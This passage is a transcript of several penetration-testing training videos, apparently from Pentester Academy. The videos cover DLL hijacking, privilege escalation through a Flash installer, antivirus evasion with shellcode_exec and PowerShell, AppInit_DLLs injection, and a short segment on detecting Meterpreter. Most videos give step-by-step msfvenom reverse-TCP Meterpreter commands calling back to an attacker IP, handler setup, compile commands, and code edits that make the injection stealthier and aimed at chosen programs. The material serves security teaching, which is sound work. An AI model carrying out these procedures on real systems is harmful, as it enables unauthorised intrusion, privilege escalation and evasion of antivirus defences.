seen before as well. Now you notice the ampersand code in here, right? If you look at the companion H file, template.h, you would find it defined here with a maximum size of 2048 bytes. Now after this, he goes ahead and sets EIP or RIP depending on whether that's a 32 or 64-bit architecture, and then starts the suspended process, or rather resumes the suspended process, right? So with this trick, we aren't loading a DLL, rather we are creating an independent process which goes ahead and pretty much runs by itself and is not dependent on the host process whose DLL we've hijacked. Fantastic. So let's go ahead and do this as a demo ourselves. So here's what I'm going to do. Let me copy out this entire code. Go inside my Kali machine. Let's create a directory. Make the mdll, change the mdll, and let's do a vim template.c. Let's paste it. Similarly, let me copy template.h. Let's go back in here, paste this as well. Now let's go ahead and compile this into a DLL. So I'm going to be using my Ming W32 just as I did in previous cases. So let's go ahead, template.c -o, let's say template.dll -shared. So if you notice, it says something about an undefined reference to inline B0. Let's open up template.c. And we have some preprocessor directives in here, build mode, which I'm sure the framework passes down. Let's just remove this if this should hopefully solve the problem. So the if and the corresponding end if. There we go. Let's look at template.dll. Seems okay. This is a 32-bit one, by the way. Keep that in mind. And let's run our Python server. But before that, keep in mind that what we haven't done, of course, is pasted any shell code in here. So let's go ahead and create some shell code which we can use in template.h. So I just open a new tab. It's a bit more cleaner. We're going to do an msf venom -p Windows Meterpreter reverse TCP. lhost is the attacker's IP address, 10.10. L port, let's say 9000, and the output format C. So what we are really doing right now is creating a DLL based on this template code, but rather than depending on the framework to populate the payload, depending on what we are doing, we've now populated the payload ourselves. Okay, here it is. Let's copy this out. Let me open template.h and let me paste the shell code in here. Let's recompile again. Start our Python server, and in the meantime let's also set up the exploit handler. Everything seems to be right, and our Python server is up as well. Let's now go to the victim machine and open up a browser. Let's surf to 10.10. We can see template.dll. Let's save it to the desktop. Now you could pretty much use this with any of the applications for which we had created vulnerabilities, right? For DLL hijacking. So you can use uTorrent, cab remover, a bunch of them. Now if you go back and review the uTorrent video, remind yourself that the DLL in question was plugin underscore DLL.dll. So I'm just going to rename this to plugin underscore DLL.dll. Fantastic. And now when I instantiate uTorrent from the desktop directory, it should go ahead and pick up plugin underscore DLL.dll, right? Now when we did this manually, if you recall, we had to go through the pains of figuring out which function call would be made. But now as we've managed to create this little hack, of course pretty much using what HD created entirely, we should be able to run our shellcode via DLL main by creating a run DLL32 process. So one of the things we can also do is start sysinternals, just so that conceptually we know what is happening. Let's start process explorer. So we can go ahead and monitor the new processes created, and we should see a run DLL32 being created, right? Okay, we can see a bunch of processes in here. Of course, there is currently no uTorrent. Let's go ahead now, launch uTorrent. I've renamed plugin underscore DLL.dll. If you notice, nothing seems to happen here. But if I go to my attacker's machine, there you go. I have my Meterpreter, right? Let's do a get PID 2760, and if I do a PS, here I am inside run DLL32. Now if I go to my Windows machine, look at Process Explorer, we should be able to locate a run DLL32. Here it is, right? We can see a run DLL32 which was created, right? Looks like uTorrent has exited now, and run DLL32.exe is running. Fantastic. Let's select some columns. So if you go back, now pretty much you have everything you need, and you could go further into the system. Anyway, the key learning here is how it is possible to still use other API calls and launch our payload via DLL main by creating another process entirely. Of course, creation of a new process is a noisy thing, something which you're going to be going to put yourself probably in a scanner's path. But hey, the best part is now we don't have to figure out how anything needs to be done. I mean, we don't need to know the function we need to hook or any of that info. We can run directly through DLL main. So hopefully you enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we will look at privilege escalation using DLL hijacking. So I was watching Mark Rusinovich's TechEd talk from 2014, and in that when he was talking about using the sysinternals tool suite to find and detect malware on a system, he demoed a piece of malware which used DLL hijacking for privilege escalation. Now this looked very, very interesting. So I thought let's go ahead and recreate that whole demo locally, creating our own hijacker DLL. Now, before we move into all the specifics of how we do the attack, let's look at how the malware did it. So I'd highly recommend going through Mark's entire talk. I think it's a very nice synopsis of using sysinternals tools from a malware detection and removal perspective. But once you go through the talk, you'll find that the malware runs the Flash installer or updater, and at that time, because the Flash installer or updater requires admin privileges, the user gets the prompt. Once he goes ahead and enters his admin account details, basically the Flash updater searches for DLLs in the current directory where the malware has already put its own mal DLL, and that goes ahead and gets loaded into Flash updater or installer, which is running with higher privileges now, and the malware goes ahead and does a privilege escalation. So for this demo, in the lab setup, I have a Windows 7 machine with multiple accounts. There is a security tube account. This is where we have to get to. And then there is a standard user Jacob account, which is what we will operate with. Now for this demo, download the Flash player. I'm using the Windows version. You can get it here. Download sysinternals tool suite. And finally, if you followed the last video, or it doesn't matter if you haven't, download the Metasploit DLL hijacker code, which we will reuse. So what is the process? Step 1, we are going to find vulnerable DLLs using Procmon for the Flash installer. So let's jump right in. So here is my Win 7 machine. First step, I'm going to run Procmon. If you notice, I get the UAC prompt. Procmon is now running. The second step is to go ahead and copy the Flash installer. So let's go ahead and do that. I'm going to create a directory called maldemo, change directory maldemo, and I'm going to copy my Flash installer. So install Flash to the current directory, and let me go ahead and run a Python server. I've also started Metasploit in the other terminal. Let's go back to our Windows machine. Let me refresh this page. I see the Flash installer. Let's copy it down to the downloads directory. There we go. Fantastic. Now let me go to the downloads directory and run this installer. And let's see what happens. It takes a little bit of time to load within the VM. Let's run this. It should throw a UAC prompt, but of course it's a verified publisher, so we are okay. Type in my password. Now notice as the Flash installer loads, it also deletes that file, right? Anyway, we aren't connected to the internet. It doesn't matter. Let this binary get closed. Now in the meantime, Procmon has collected, I think, 250,000 events. Let's filter these out to the ones we are interested in. Now, here is what I'm going to do. The process I'm interested in is the Flash installer. Here it is. Let's add and apply. The next thing I'm interested in is the DLLs which fail to load from the current directory, and this would yield a name not found. Let's add these, apply, and then basically just go ahead and make this specific to the downloads directory. So let me go ahead and add path contains downloads, right? Okay, so here is what I can see right now. There seem to be a bunch of DLLs. I can clearly see CryptBase, WebIO, CryptBase again, and there are a bunch of DLLs which we can clearly see. You know, we read something which says DNS, there's something else which says DHCP, SVC 6, and so on and so forth, right? These are loaded much later, of course. Cool. So now let's go ahead and minimize this. Let's go ahead and copy this back again to the downloads directory, create a new instance because the last one was deleted. So step one, we've figured out a bunch of DLLs which could be vulnerable because it's being searched in the directory of invocation. Step two is, of course, to create the hijack DLL from Metasploit's template code. Now, from the last video, you already remember this URL and this code. Let's quickly go ahead and copy this out. For a full explanation of what this code does, please refer to the last video in this series. So I'm going to create a template.c, paste this in. I'm going to go ahead and remove any preprocessor directives. And I'm also going to create template.h, inside which I'm going to put in just these through lines. Honestly, we could just even copy it inside template.c. Okay, but we need a payload, right? We need a payload. So let's open a new tab real quick, run msf venom, create a payload, Windows Meterpreter reverse TCP lhost equals 192.168.10.10, lport equals 9000. The output format would be C so that we can include it inside of our binary. By the way, this is the latest Flash installer downloaded from their website, right? This isn't something which is the old version of a program or anything like that, by the way, just so you know. So let me copy this shellcode out. Let me just quickly double check everything looks okay. I'm going to feed the payload in here now. Fantastic. Now let's try to just quickly compile this using the Ming compiler. Template.c -o. Let's call this template.dll momentarily. And this is of course going to be a shared library. So if we now look at template.dll, we'll see it's a P32 DLL. Let's start our Python server once again. Let's go back to the vulnerable machine. refresh this, we see template.dll. Let's copy this also to the downloads directory. Now let's set up Metasploit before we do anything, so that we can receive the shells. Use exploit multi-handler, set payload to Windows, Meterpreter reverse TCP, set our host to 192.168.10.10, the attacker machine IP address, and then finally L port to 9000. Now I want to test with multiple DLLs, so I'd like to receive multiple shells rather than having to restart this over and over again. So I'm going to do a set exit on session to false, and I'm going to put in an exploit -j. There we go. So now we can receive multiple reverse TCP Meterpreters. So let's go back to our Windows machine. Let's pick up the first DLL. So this one is scriptbase.dll. Okay, let's go down to the downloads folder and let me rename this. Let me just make a copy of this. So I'm going to rename this scriptbase.dll, right? Scriptbase.dll. Keep in mind on Windows the case doesn't matter. Scriptbase.dll looks okay. Now when I run the Flash player, of course scriptbase should be picked up and we should hopefully get a Meterpreter session. Let's see what happens. So I'm going to run the program. Program seems to be running. Unfortunately, I'm not getting a UAC prompt. But looks like I have gotten a Meterpreter session, right? You can already see that basically this is using the UID Jacob, which isn't good yet, right? There has been no privilege escalation yet. Now, this is absolutely normal because at this time probably the binary hasn't requested yet for privilege escalation. Right, binary isn't requesting anything. Let me postpone the scan. I thought I postponed the scan, but something seems to be happening. Right, and of course at this point this did not get deleted as well. So look like scriptbase.dll is not a good candidate. So let's actually pick something else from the very bottom, which we probably would feel would be something which would be loaded once the UAC prompts hits in and privilege escalation has happened. So how about this one? DHCP CSVC6, right? Let me use this one. Let me go back in here. Let me rename this to DHCP. And then what did we have? CSVC6. Okay, CSVC6. Right, and now let's start the Flash player again. Hopefully there isn't an instance running and there isn't a mutex check or something. Okay, it isn't running. Let's start the Flash player again and see what happens. Okay, runs. Perfect. I have the UAC prompt. And of course, till this point, we do not have a Meterpreter session, which is great news for us. ABC 3. Something seems to happen, but if we, looks like, right, this is trying to run. And we get a Meterpreter session. This is great. We can already see this is great news because this one is with security tube. So if you do a get UID, now we are security tube, who is the admin on the system. Fantastic. So now you saw how we could very easily go from user space to admin space. And of course, after this, you can very easily do a privilege escalation attack using something like get system, and now your system as well. Fantastic, right? So we went from user space to admin to finally system, and now we completely own the system. So you can see how something like DLL hijacking is being used by malware to go ahead and do privilege escalation in a relatively simple way. And of course, the best part here is we used something like Flash, which people are very commonly accustomed to downloading and updating, and hence nothing wrong was perceived, right? Of course, the stage one of the malware getting on the system still remains, but in today's world where everyone is downloading binaries, exes, installers, cracked programs, movies and whatnot from every place in the internet imaginable, this shouldn't be too difficult. And of course, there are also 0 days and known exploits which aren't yet patched on many systems, which could also lead to all of this. So keep in mind, finding the right DLL for privilege escalation can be a bit of a trial and error, because only the DLL which is going to be loaded in after the privilege escalates is the one we are interested in. Now, in this video, I did not replicate the functionality of the real DLL, and unfortunately, everything seems to crash at this point. Of course, the attacker did manage to get admin and system, but of course, a piece of malware could be clever enough to ensure that it replicates the functionality of the DLL as well, while going ahead and having its shellcode executed, just like what we saw in this video, in which case the user would not even figure out that something is wrong. So hopefully you enjoyed this video, and if you have, please do recommend Pen Tester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pen Tester Academy. Now in this video, we will look at AV evasion using shellcode exec. So really, what is shellcode exec? Well, it basically is a binary which expects the shellcode to be given to it as input from the user, and the input format is just going to be alphanumeric or some other textual format, which of course no AV will ever flag, and then shellcode exec at runtime will load this up into memory, decode it, and run it. Now, shellcode exec has been around for some time, and funny enough, most AV manufacturers have gone ahead and quarantined its stub. So if you have shellcode exec, it might not work, but as a concept, it is great, and the source code is available. So looking at what you learned with Whale, whereby scrambling the source code and doing a lot of other things, you can go ahead and beat the AV's signature mechanisms and heuristics. You should be able to run shellcode exec as well, right? So shellcode exec is available on GitHub, right? You can go ahead, click on this URL and get it. I already have shellcode exec on my Kali machine. So I'm going to use the Windows version. They have the Win32 version by default. So let's go ahead and put this here. Now the shellcode exec's Git page has a ton of information about how it works. So it's very simple, right? This is the part where they explain how it works. You can pipe your binary encoded shellcode to Metasploit's MSF encode to encode it, blah blah. And then we finally use a alphanumeric encoder to go ahead and get an alphanumeric output, right? And after that, we set the buffer register to the EAX register, This just ensures that we avoid any form of get PC stub, which a lot of AV are habitual to detecting, right? Get PC is really get program counter. That's the way by which how control passes can be detected by the AV. So what does this do? This spawns a new thread, and the shell code is executed within an SEH handler. So in case there are any unexpected problems, the program would not crash, right? SEH is just structured exceptional handler. Think of it very basically as a try-catch kind of a system. So let's go ahead and run this. So here's what I'm going to do. I'm going to copy this out, go back to our Kali machine, open a new tab, paste this and customize this for us. So I'm going to go back in here. The L host for us, of course, the attacker IP is 10.10, and let's make the L port 9000. Right. So what does this do? It takes Windows Meterpreter reverse TCP, as you can clearly see here, and then uses MSF encode and an alpha mixed encoder for x86. And again, this tells that the buffer register is EAX. So let's run this. I have an extra dollar in the front, which is causing an issue. In the meantime, let's copy this to our Windows machine. I'm going to copy this on the desktop. Here it is. Let's open a command prompt. Of course, when you run it, it says alphanumeric needs to be input as well. So let's go back in here. Here is our alphanumeric output, which is what we are going to be using. Having some problem with my mouse. Okay, I'm just going to copy this out. I'm going to edit it at the other end. Now I also have Metasploit running, so let me set up an exploit handler. Exploit multi-handler. Set payload to Windows Meterpreter reverse TCP. Set L host to 192.168.10.10. Set L port 9000. Hit exploit, so we are waiting. And on the Windows machine, let me paste this. Copy this one again. Let me copy this locally to notepad session here probably. Remove some of these characters in here, which begins from root at Pentester Academy. Copy the rest. Okay, and now let me paste this inside this VM. Some odd reason it doesn't allow me to do a paste. Okay, that should be an easy way. Here is what I'm going to do. I'm just going to go ahead and dump it in the same folder. So let's just dump this inside the folder where we are running our Python server. It seems to be the same server. Let's call this shellcode dump. Let's actually rename it to a text file so we can open it up real quick. Just verify we have what we need. Yes. Let's go back to the Windows machine. Hopefully this shouldn't copy any other characters, but let's try this out. There we go. It's already run. If we go back to our attacker machine, there we have it. We have a Meterpreter session waiting for us. Fantastic. So now you can see how it was possible for us to use an alphanumeric shellcode, which pretty much most AVs would not detect at all, and then use it to run remotely. Now, however, what AVs do detect is shellcode exec itself. And you can run this to different AVs and you would see that. However, the fact of the matter is that one could trivially obfuscate the existing stub of shellcode exec or create their own one, as we've seen in previous videos, and this custom code would pretty much not be detectable. So hopefully you've enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we're going to look at detecting Meterpreter with available tools. So in this entire series, we've seen how successfully we've been able to do post-exploitation with Meterpreter. But the question arises, are there tools available which can detect Meterpreter? Now, as you can imagine, detecting Meterpreter can be pretty painful simply because it is entirely in memory, which means a tool would have to scan the memory of different processes and see if it can find strings which match Meterpreter. Now, Antipony and Antimeter are two tools which do this. So let's look at a demo. Now, I already have a Windows machine running BadBlue, which is, as you know, a vulnerable software. So I'm going to go ahead and exploit this. At the very same time, if we go to the Metasploit directory, and if we search for the Meterpreter DLLs, it's basically in here. Right, the metsrv x86.dll, you'll actually notice there are a lot of strings which you would find in it. Right, and Antimeter's author, which is one of the tools to detect Meterpreter, actually tells you that he uses some of these strings. Anyway, let's first exploit the host. Let's set the R host, which is the Windows machine, 10.100. Let's set exploit. And there you go. We have Meterpreter in the box. Let's look at the process under which we are in. 2420. And 2420 is really the bad blue.exe binary. So now let's actually go inside the victim machine. Let's run anti-meter and see how good it might be. Let's run this. If you notice, it says scanning memory and it detects Meterpreter and says, would you like to kill this process? Let's no for now. Let's close anti-meter and let's open anti-pony. I'm using a 64-bit Windows 7, so I'm going to be running the 64-bit version. So if you notice, it's scanning memory right now. And there you go. It actually tells you inside bad blue, Meterpreter is there. It even tells you the network connectivity information. Now let's do something interesting. Let's actually go back and migrate Meterpreter into another process. Let's say let's migrate into Winamp A, which is 2180. Let's go back. Let's rescan. And see what happens. Let's see if it can figure this out. Now basically it tells you that there are two processes which seem to be corrupted by Meterpreter. Let's actually try anti-meter and see if it can detect as well. So it says Winamp A, I'm going to put in no. It says bad blue, I'm going to put in no, right? So as you can clearly see, both these tools have been reasonably good at detecting Meterpreter by simply scanning memory. Now, unfortunately, this isn't something very scalable because one can only imagine how much of processing power one would take if we had to scan the memory of all the processes to see if we could find traces of Meterpreter. And unfortunately, this is the reason why most AVs do not scan memory actively to detect Meterpreter. Anyway, but as one could see, even with very trivial detections like searching for strings, etc., it's possible to find Meterpreter on a victim. So hope you enjoyed this video. Please try out both the tools for yourself. And if you're enjoying your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pentesting course at Pentester Academy. In this video, we will look at AV evasion with PowerShell. So for those who do not know, what is PowerShell? It's a very powerful scripting language on Windows-based systems and is used by admins to go ahead and automate tasks both local and remote. The best part is PowerShell leverages the .NET platform and has access both to COM and WMI, which pretty much gives admins a lot of power to read, change config, etc. Now, why is PowerShell so great from an AV evasion perspective? If you think about it, well, PowerShell, just like any other scripting language, has all its code written in a simple text file, which is interpreted at runtime and run. So most AVs, unfortunately, do not view a text file as malicious, and hence the PowerShell script files themselves aren't flagged by most of them. So let's actually do a quick demo. So here is my Kali machine, and I'm going to be using Whale simply because it already has some stuff built in for PowerShell. I'm going to do a quick list, and if you've never heard of Whale before, please go back and visit a couple of videos in the past and you would find it. Now you see a lot of payloads. This is the one we'll use, PowerShell Meterpreter reverse HTTP. Right, so let's do a use 16. We have to set the L host, so let's set it. Set L host. This is the attacker's IP. We could actually make this 192.168.10.10. Let's do an info. We've set the IP address. The port is set to 8080, which is fine. So let's go ahead and do a generate. The base name PowerShell AV. There we go. We can now exit this menu and let's start MSF console with the RC script created by Whale. And in a new terminal, let's go to Whale output source. We see our PowerShell av.bat. Open it up. Of course, there is a little bit of obfuscation added by Whale additionally, but really this is pretty much just very simple PowerShell code. So I'm going to start my Python server here. And let's go to the victim machine. Now the victim machine is Windows 8 running AVG 2015, updated pretty much in the last 5 minutes. Let's go to the attacker machine. Let's download PowerShell. Let's open the folder. Here it is. Well, you could pretty much run the AV scan on this. If you notice, it says no threats detected, and the protection is up to date as well, right? 10/20/2014, which is basically today's date. Let's go back to the attacker machine, and here we go. Looks like Metasploit has been set up as well. Let's run this. So this is running. Of course, let's run this anyway. Let's go back in here. Just hope we have, of course, we do have network connectivity. Okay, let's start this again. it looks like loading was slow. However, we already have two Meterpreter connections. One seems to be from the first one. So let's connect to this. Let's run sysinfo, and there you go, right? Everything working perfectly. Let's background this. The second session should be basically from the second execution. I do not know if you notice, this one doesn't seem to have STD API loaded up, and you see that little error in here, right? Failed to load client script. Anyway, the first session is good enough. If we go back in here, we now can pretty much do anything we want on the remote system. There you go. Do a get UID. We are admin. Fantastic. So you can see how using PowerShell, it is very, very easy to go ahead and evade AVs. This is a very common technique used by attackers right now, simply because of the fact that most AVs do not look at PowerShell scripts in a suspicious manner. So PowerShell is really the new VB. Okay, so hopefully you guys had fun in this video, and if you did, please do recommend Pentester Academy to friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now, in the last couple of videos, we've seen how we can use DLL hijacking in our favor to do things like privilege escalation. Now, in the next two videos, we are going to look at how we can use DLL injection to get Meterpreter on the box. Now, keep in mind that in DLL injection, we are somehow injecting ourselves inside the process. There are many techniques, one of which is really very interesting and probably the easiest to do, which is using a registry setting called AppInit_DLLs. Now, according to Microsoft's documentation, this is a mechanism to allow an arbitrary list of DLLs to be loaded into each user mode process on the system. Fantastic. So what this really means is that we could pretty much inject inside every user mode process if we can change this registry setting to point to our DLL. Now, there are a couple of settings which we need to take care of. The first, of course, is load AppInt DLLs. Now, this globally enables or disables AppInt DLLs. So once we break into the machine, we would have to set this to enabled. By default on Windows 7, this is set to disabled. Now, the second setting, of course, is to go ahead and add our malicious DLL in AppInt_DLLs. This should be easy. The third is that Microsoft has a little modification done for 7 and above, which is require signed AppInt DLLs, and this forces to have only signed DLLs. Now, I was thinking, wow, this would ensure that pretty much we might not be able to do anything much. But the interesting thing is, A, this is configurable, and B, by default, this is turned off. So we can see in the documentation it says, in the interest of application compatibility, Windows 7 will load all AppInt DLLs. Fantastic. So I think user convenience as well as ensuring old applications don't break ensures that this would work. But keep in mind that for server 2008 R2, probably for all other servers above that, it must be code signed by default, unless of course you can turn it off. Now, the best part, as one can imagine, is in the post-exploitation phase, it is very easy to go ahead and change these registry settings and take control. So let's look at where these registry settings are. This is my Windows 7 64-bit machine. Here is regedit open. So under HKey local machine, under software, Microsoft, Windows NT current version, and if we scroll down, select Windows, and then you'll actually find appint underscore DLLs. By default, of course, there are no DLLs which should be loaded, and load appint DLLs, which by default is set to 0. Fantastic. So as we are probably thinking, why not take our Metasploit evil DLL, which we took from the framework as we did in the last videos, and then use that with this. So let's go about it. Here is the Metasploit DLL code. Of course, you also have it on the slides, and you should have followed previous videos. So I'm going to open it up in raw format so we can copy it. So let's copy this out. Here is my Kali machine. I'm going to create a directory and call this DLL inject demo, and let's have all our code inside of that. And I'm going to call this AppInit DLL inject.c. Let me paste all the code out. Now this lower part here can be comfortably removed because it's anyway commented out. Let's go up here, just make small modifications. Let's change the build mode one here. Let's remove the end if here. I'm going to use this with a 64-bit machine, so I would just want this line and everything else to be removed. So let's remove this, remove this, remove this, and remove this. Fantastic. Let's go back. Now template.h, this is something we included, but if you recall, the source code for template.h was really very minuscule, and this is something we can copy out very easily rather than having to dedicate a new file for it. So let me just copy this out, go back to the machine, delete this line, and paste the code. There we go. Now the next step, of course, is to generate a payload and substitute it here. Let's do that as well. MSF venom -p Windows x64 Meterpreter reverse TCP L host equals 192.168.10.10. This is the attacker machine IP. L port equals 9000, and let's get the output in C format. So this is going to generate a 64-bit Meterpreter reverse TCP shellcode. There we go. Always have trouble with having to copy stuff. Okay, now let's go back in here and let's add our shellcode in here. This is the 64-bit shellcode, and let's paste it. So now we have everything inside the same file. Things look okay. Keep in mind this is the 64-bit version, and I'm going to use the 64-bit Ming compiler to go ahead and compile this. So here is W64 GCC and I'm going to go ahead and use AppInject DLL, and let's actually call it AppInject DLL.dll, right? -share, just so that this becomes a DLL. Let's quickly do a file, and we've generated a P32 plus or a 64-bit DLL. Fantastic. Now let's also set up Metasploit to receive our shell. So I'm going to set up MSF console over here. Just want to ensure our IP is all set to what we had in the payload. Yes, it is. Now let's set up our Python server. And while Metasploit starts, let's go back to the Windows machine, start Explorer, and download this DLL. So I'm just going to go ahead and download this DLL. Let's save it to C drive. Let's close it. Here it is. Let's copy this out. Let's go to the editor here. And of course, this is going to be under C drive, space this .dll. Right? Keep in mind, we still haven't enabled anything in here. Now, let's actually go ahead and start the sysinternals tool suite. Let's start Process Explorer so that we can actually see processes come up. I have additionally enabled show lower pane, and I want to see DLLs. Okay, this is an additional option which has been put in. Now, at this point, if let's say I start Notepad, I actually find Notepad starts up, and of course we would not have AppInit inject.dll, right? We don't have it in here at all, just as expected, because the option isn't enabled entirely at this point. So let's actually set up the handler in Metasploit. Use exploit multi handler, set payload Windows x64 Meterpreter reverse TCP, set a host 192.168.10.10, set a port 9000. We might want to try and receive new shells, so let's actually give that option. So set exit on session, set it to false, and let's just do an exploit -j. Right, so now we can receive multiple shells. Now let's go back to our Windows machine. Now before I do anything, I would want to go ahead and test the 64-bit DLL, right, just to ensure it's working fine. So let me go to C drive, and I'm going to go ahead and run C drive Windows syswow64, and then go ahead and use run DLL, which we've looked at before, and basically give it appinject.dll. Pretty much start anything in it, doesn't really matter. And let's run this. Something seems to be happening, and as expected, we get our first Meterpreter session, right? So the DLL definitely is working fine. There is no issues with it at all. So now let's actually go back. I'm going to close this run DLL, and now let's actually turn on the option globally for load app in DLLs. I'm going to set this to 1. And now let me start Notepad and see what happens. So I'm going to go start, let's say, Notepad. If you notice, I see run DLLs in here. But I see actually a bunch of them. Can you see that? Actually, there are a lot of them being started and disappearing. Unfortunately, I still haven't received a Meterpreter. And run DLLs seem to be just getting created, destroyed, and restarted. So here is what the problem is, right? The Metasploit code which we were using, well, this in turn, if you recall, is starting a run DLL. Unfortunately, because every user space program would go ahead and have our DLL injected into it, this new run DLL has the DLL injected, which in turn now starts another run DLL, which would probably have something injected. And as you can clearly see, this isn't really working out, right? And we aren't getting a shell. There is pretty much like nothing happening. Right, which as you can clearly see is a big problem at this point. So here's what I'm going to do. You can clearly see many of these are getting spawned. So let's go ahead, disable the setting so that no new ones are created. And you'll notice that the moment we disable this setting, many of them would just vanish very soon. And if you notice, we do manage to get a bunch of shells, right? Couple of them which were started. Okay, not bad, but of course this isn't something which would actually work, right? So as you can clearly imagine, what we would need to do is to basically modify the source code of this program, which is basically the default Metasploit DLL, and we would need to check before executing our payload if the process which we've been loaded inside is run DLL, and if that's the case, then do not execute more payloads, because or else we are just going forth in a chain. So that's something we do not want to do, right? Okay, great. So that's all I had in mind for this video. In the next video, we will go ahead and modify the source code and run this example. So hopefully you enjoyed this video, and if you have, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing course at Pentester Academy. Now in this video, we'll look at part 2, in which we will modify the Metasploit's DLL template to go ahead and make it suitable for use with appint_DLLs. So as we discussed, the first thing we would need to do is figure out the name of the process under which we are running. Now, if you Google around, you would actually find that get module file name is the API we would call, and it is in kernel32.dll. Now, this API is really very simple to use. If we go to the API documentation real quick, and all this API says is, hey, if you want to know the current process executable path, then just pass in the first argument as null, as mentioned here. If this parameter is null, then get module file name retrieves the path of the executable of the current process, which is what we want. And then we go ahead and pass basically a pointer to a buffer, LP file name, and the size of that buffer, right? Which is where this API would return the string. And basically, if you notice, this would be in tchar. So this seems to be very, very interesting. However, we need to keep a couple of things in mind. There are some limitations of what we can do at this point inside DLL main. Now, according to Microsoft's documentation, AppInit DLLs are loaded by using load library during DLL process attach, process of user32.dll. So keep in mind, executables that do not link user32 do not load AppInit DLLs. However, there are very few of them that do not link with user32. That's one limitation, which means any user mode process which doesn't link to user32 would probably not have a DLL injected inside of it from AppInit DLLs. Now, the second part is really more important. Because of their early loading, only API functions that are exported from kernel 32 are safe to use. This is a huge limitation, because what this means is we cannot use any other APIs apart from those in kernel 32, and of course your absolute raw C programming, which doesn't depend on any APIs from Windows, or which probably doesn't even depend on any library. So this is important. Now, how are we going to work on this problem? Inside of DLL main, all I want to check is if I am loaded inside run DLL32.exe. If that is the case, then I do not want my payload to be started. If that is not the case, then I would want my payload to be run, and of course other things would follow. So let's jump right in. Here is the code which we wrote in the last example. Now let me go ahead and modify this further. Now here I would want to know the name, or rather the path of the executable inside which we are running. So let's allocate some space in here. So let's say tcar file path, let's say 2048, and in here let's use this API get module file name. The first argument of course was null, the second argument is file path, and the third argument is the length. So this should ideally go ahead and return the file path inside file path. Now we need a comparison function which can check if run DLL32.exe is basically inside the file path, right? Actually it should end with, but we could pretty much assume run DLL32.exe is pretty unique. Now the problem is, typically you would use something like str maybe in here, but we would want to do this from basic principles just using pointers, similar to what I think HD Moore had done here of creating his own B0 function, right? And he mentions the exact same thing. He says, hey, hand rolled B0 allows us to avoid including MSVC runtime, right? Which is really what we want to do here as well. Now, writing code to go ahead and check if a string is present inside another is really quite trivial, but I don't want you guys to spend your time in programming. So I have a little link here from where you can pick up an implementation. So there are really two implementations on this page. I'm going to just pick up the first one. You can read the post and then tell me what is the advantage of picking up the second one, right? Or really, would it even matter if we picked up either in our case? So I'm going to just pick this up. I'm going to paste this. And let's just remove some small stuff here. I'm just going to remove the const keyword. Okay, so what this does is this checks if target, which would be run DLL32 as an example, is it present in str or not. If it is, then it basically gives us the location. If it isn't, then it returns null. So all we have to do is check if the return value is null. Let's also rename this function. And let's call this should something a little bit more descriptive. Maybe run DLL check. I'm going to go back in here. Let me write some very simple C code. If null, rather, whichever way, different people do it in different ways, run DLL check on file path, comma, run DLL 32 equals null. That's the only case when we run the payload, right? In all other cases, we do not run the payload. Now, one of the other things which the Metasploit guys have done is at the very end, they have an exit thread. Now, we want the process really to just load the DLL and continue running so that the user does not see anything unexpected. So I'm going to remove this line. Okay. You could have put in a run DLL32.exe as well. Okay, now let's go ahead and compile this. Let me call this inject2.dll just so that it's easy for us to remark. Let's do a file just to ensure this is a P32DLL as well. 32 plus, sorry. Yes, it is. Now let's run our Python server. Let's go back to the Windows machine. Let's actually kill some of these run DLLs which we do not need at this point, just so that we can start afresh. Now I'm still pretty much using the setup which we had in the last video, and that's the reason why you still see these running. So this is pretty much a continuation, almost an immediate continuation of the last video. There we go. So Meterpreters have been killed, and if I look at it right now, we should have no sessions as expected. Okay, now let's actually go back in here, get the new DLL, save it, go back to the registry editor and change this to basically have 2 in here, and then let's enable these DLLs by hitting 1. Now let me start, let's say, calculator.exe. If you notice, calculator starts perfectly. It'll also work perfectly. But if I go back in here, awesome, I have my Meterpreter session. Fantastic. I could go back in here, I could look into Process Explorer, and you'll actually see that calc.exe has started a run DLL32. Right? Fantastic. Now inside calc.exe you see an AppInit DLL inject2.dll, and you see the same inside run DLL32.exe as well. The best part is inside run DLL32, this AppInit DLL inject2, kind of a tongue twister, doesn't do anything. The payload doesn't get executed just as we'd want. Let me start Notepad. Here you go. Keep in mind this is just for 64-bit processes, is what I've created. Again, we can actually see now a Notepad spawning a run DLL32.exe as well. And if you go back in here, you would notice now we should have 2 new sessions available to us to work with. Awesome. So you can already see how much power we have using this injection technique. And because we also allow the original program to continue by ensuring that the thread doesn't exit, the end user probably does not see anything different. Now, keep in mind the attacker can be way more stealthy by only enabling the inject for certain binaries like Internet Explorer and all of that, through which the attacker might want to gain interesting insight into what you're doing. Anyway, I leave that as an exercise to you to modify the code and try it out. So that's all I have in mind for this video. And if you enjoyed your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pentesting course at Pentester Academy. Now in this third part of the app and DLL, I'm going to take up the exercise I'd given you in the last video. So the problem, as we can see right now, is that every user mode application would end up giving us a Meterpreter session. As much fun as this is, and of course you can never have too many Meterpreters, this is very, very noisy, and eventually either the AVs, IDSs, or even the user would pick it up. Now, what we need to do is, once our DLL is loaded, we would like to check if this is a process we would want to go ahead and execute our payload under, right? So we would only want to do this in interesting processes. So let's jump right in. Now, here is our code from the last one, which I have modified. And the only addition which has been done here is that I have a list of programs which I have put in here. This is basically an array of strings in C. And then after that, I figure out my file path under which I am being invoked. And then I iterate through the array of allowed programs and check if the current application I'm running under basically matches these or not. If it does, I execute the payload. If it doesn't, I don't do anything, right? So let's go ahead, compile this. Let's call this version 2.dll. So this seems to be a 64-bit DLL. Let's run our Python server. And in Metasploit, let's set up a handler. Set payload to Windows x64 Meterpreter reverse TCP. Set lhost to 192.168.10.10. Set lport to 9000. Set exit session to false. And then let's hit exploit. Forgot we had to do an exploit -j. Now let's go to our Windows machine. First would be to run the browser. And to download AppInject v2.dll. Save it to C drive. Let's also go ahead and run the sysinternals tools. The one which we are interested in is Process Explorer. So you can see Process Explorer is running here. Now I'm going to go to the registry, first add the DLL, 